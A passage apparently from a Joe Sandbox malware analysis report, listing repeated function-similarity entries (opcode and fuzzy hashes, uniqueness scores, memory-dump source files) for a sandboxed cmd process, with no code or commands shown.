                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5da45a8485d20c8b95252c931bd379aee1740f66f670ec1cc4cacfcd864c1fdf
                                                                        • Instruction ID: 8419f2087adc2f9380072ca6eba1cee4d9f08e69added792ca6a2f434e4230ba
                                                                        • Opcode Fuzzy Hash: 5da45a8485d20c8b95252c931bd379aee1740f66f670ec1cc4cacfcd864c1fdf
                                                                        • Instruction Fuzzy Hash: 880149325452009FC739DF1BC840E52B7ACEB8E370B294265E96A9B195DF30EC01CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab5897006d02e89164175db61a8ca9340d8490743cd0c3de209602ca8c1b639b
• Instruction ID: 71ca1e20814b27da0267dbf24d82f99d046240a01317c01858ce15825e1f7855
• Opcode Fuzzy Hash: ab5897006d02e89164175db61a8ca9340d8490743cd0c3de209602ca8c1b639b
• Instruction Fuzzy Hash: F4115E74641218ABDB25EB64CC41FE9B378EF0C710F5045E4B318AA0E0D7709E91CF84
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
• Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 17bdc2a09bd5068f5985ef7041874900b114c53e38ae001cb4d4824c779d6630
• Instruction ID: c0d463c3ad5a71084300030d16bf9b05827234a7e96de2836258ac7204e17a8b
• Opcode Fuzzy Hash: 17bdc2a09bd5068f5985ef7041874900b114c53e38ae001cb4d4824c779d6630
• Instruction Fuzzy Hash: D201F775241B009FC331DB5AD940F52BAE8DF4DB50F010829F3059F390C7B0A8528BA4
Uniqueness

Uniqueness Score: -1.00%

                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00eebf5b9d58daa483d639afef4ed96f670f64928163b51cdd5da5c8eb389832
                                                                        • Instruction ID: c561ae9996e942523fd56c9903b3ab2703a1b157cf010130fbe920a6f4605743
                                                                        • Opcode Fuzzy Hash: 00eebf5b9d58daa483d639afef4ed96f670f64928163b51cdd5da5c8eb389832
                                                                        • Instruction Fuzzy Hash: 79F090719127D09FD731DB9AC0C4B61B7D89B09621F0D8DABD649875A1CFE4D880CE50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0295096e17932eace54b97e36b3bb4308ea6381e03196d8634b43ffe4e5f310
                                                                        • Instruction ID: 0f3cfc2e9802250ae450ff8d9e1634b6a7f683004814225248a55df841de143c
                                                                        • Opcode Fuzzy Hash: d0295096e17932eace54b97e36b3bb4308ea6381e03196d8634b43ffe4e5f310
                                                                        • Instruction Fuzzy Hash: 44F0826A4267C48FCF25EA2869502D5EB69E75D110F1D148DC4A16B205C775C9C3C664
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction ID: 6bfd63303fb12488146838ac32b8be81723241426973ecb09c0ccfa78237a8ca
                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction Fuzzy Hash: 95E09232301A006BD721DE59CC80F47B76E9FCAB10F040479B9045F251CBE29C5986A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31ddce2429a75077a693734961688eff593b64d1e0cf02ac0f5b8e80697081a7
                                                                        • Instruction ID: 27be4671cd33512e22c565d14666af9d3ae7af7c96648cbffcdf27d74292e8c6
                                                                        • Opcode Fuzzy Hash: 31ddce2429a75077a693734961688eff593b64d1e0cf02ac0f5b8e80697081a7
                                                                        • Instruction Fuzzy Hash: 0BF0E2F55916909FC332D718C548B51F3D89B4F7A0F0D9475D40697722CB64C880CAD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction ID: 52e01cffdbc8f93446a147e80d7fe7e106ee604db3862c68ec6cf0989d85cf53
                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction Fuzzy Hash: 19F01C721046049FF724CF05D984B52B7A9EB49764F5A8066E6099B560D379EC80CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction ID: b7f1fe598696a1ed586682cd559712f7bf0dd3bed318c3e606c3b575247d253d
                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction Fuzzy Hash: E6F0ED3E604740DBDB1ACF16C040AE57BA8EB4D360B054494FCA28B380EB75EA82CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cfeb0469237dbdba3a95152ad42aea127525978990906a68f20843ff503669f
                                                                        • Instruction ID: b8f9146a9bfed0664d68063b92b427aec5df7152a85e8d3699622c29afcd55fe
                                                                        • Opcode Fuzzy Hash: 2cfeb0469237dbdba3a95152ad42aea127525978990906a68f20843ff503669f
                                                                        • Instruction Fuzzy Hash: E3F02B399266904FD771D727E140F56B3E4AF0A630F0E05A4D4118B911CF34FC40C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 41028574caaa289681eb119a24c03b700360d5231ce17a48a1895dd3d626cc08
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: CCE0D836A00620BBDB21D7998D01FAABAACDB98E91F090054B500DB0D4D630DE00C6D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d229cb81919af78028d41c6eb4bc4acb3ebaa3d35a5b74393717f3235291e82f
                                                                        • Instruction ID: c79c5d22808ffdc775705fc5c274ecffd45e1887fa95e67d48e27986b60494c1
                                                                        • Opcode Fuzzy Hash: d229cb81919af78028d41c6eb4bc4acb3ebaa3d35a5b74393717f3235291e82f
                                                                        • Instruction Fuzzy Hash: 43E09236100A549BC321FB29DD01F8A779AEB58360F014925B1555B190CB70A851C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction ID: d2b303f7f4a9cc3d14e0266cdef579b2c6013671de23a7fe5b67c9ef88be4621
                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction Fuzzy Hash: 73E01A39010B50DFD736EF2AD948B96BAF1AF48711F1D8C2DE09A194B0C7B598D1CA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction ID: 3a22bebeee84eb3a2a470ccdc70917a3a60d047b5fead5a559ae6629a078c148
                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction Fuzzy Hash: 1CE0AE343003068BD715DF1AC040BA3B7A6BFD9B10F28C068A8488F205EB32A8428A44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction ID: 3234147eede3713985fbfb88c309b32cc201001f9efd20b1ce833bbe2c700643
                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction Fuzzy Hash: E7E08C35106A10EFDB71EF11DC00B9576A5FB48B50F248C6AF1860A8A48770A8C2CA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f4eb73b340ba9feaf1d2590bf4dc5321bfb57d1d6b22a48ad0489903fa5fdd8
                                                                        • Instruction ID: b14a6765334162a69e25f8b9f230cd93cd45cab72403f0689489fa3f900b673b
                                                                        • Opcode Fuzzy Hash: 7f4eb73b340ba9feaf1d2590bf4dc5321bfb57d1d6b22a48ad0489903fa5fdd8
                                                                        • Instruction Fuzzy Hash: C3E08C322006506BC211FA5DDD40F8A739AEB99260F000122B1508B2D4CB60AC41C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: 487678aea209487b70082bef77f9727e02b14c04fc441830def0bc690d0c4d4d
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: DEE08633111A1487C729DF18D511B72B7A4EF49720F09463EA51387780C634E548C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction ID: 40d1b279a5448fa6f3f5fd88d386bf01a288d7f48fceac26d7063916bf309ef9
                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction Fuzzy Hash: 1CD01236511A509BC3319F16D900953B6F5FBC8A10705052EA45542914C770A806CA90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: 1d34110a31632a56ae324c9cc42c4f82bf4cc03d0e35c22b55b9af675cb57cef
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: C4D0C7326546505BD771EA1CFC04FD373E9AB4C761F190459B015C7154D765AC41C644
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: da4ee0334f5d34dca33680752b03e6f222798b35502bf4c3c850f2e532b2501e
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: EEE0EC3AA507849BCF12DF59C640F9AB7F9BB88B40F190458A0485F660C724A901CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction ID: 3f5a8ffbea8b2c6e4c239fae44052ea0f4daabcd59bfb66ac2f2f98561df9c9c
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: BDD022323130309BCB28E6546800FA7B905EF80A90F0A002D350E93C00C1048C83CAE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afc36ab9cffc31f343511308d8d113d9899223890d63f489bcbc367b4104c898
                                                                        • Instruction ID: 222ee01879d7cf393ab72e11e7d17103528f696f4bf784c5120df853a77ad760
                                                                        • Opcode Fuzzy Hash: afc36ab9cffc31f343511308d8d113d9899223890d63f489bcbc367b4104c898
                                                                        • Instruction Fuzzy Hash: D0D0A938B01101CFCF1BEF04CA15FAEB2B4EB0C740B4800B8E702A2020F3A8DC02CA90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 68437ea7ac071486986e0d7bb224ab7013435147913a72a97941fded1b2a8a0c
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: 2ED0C935612E80CFC71ACB4DC5A4B55B3A8BB4CB44F8544E0E401CBB21D72CE9D0CA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 28226276df3254a38d4cd8ec5cd661f890d191e8b8b8e20eddccd1145c6f7920
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: B1C0123A290648AFC712EA98CD01F427BA9EB98B40F000422F2048B670D631E821EA84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 6899f5e034ea4fa9ea01d608f9afc97a7ade4a3921520df9c3738c46bc30ed82
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 2ED01236100248EFCB01DF41C890D9A7B2AFBCC710F108019FD190B7108A31ED62DA90
                                                                        Uniqueness

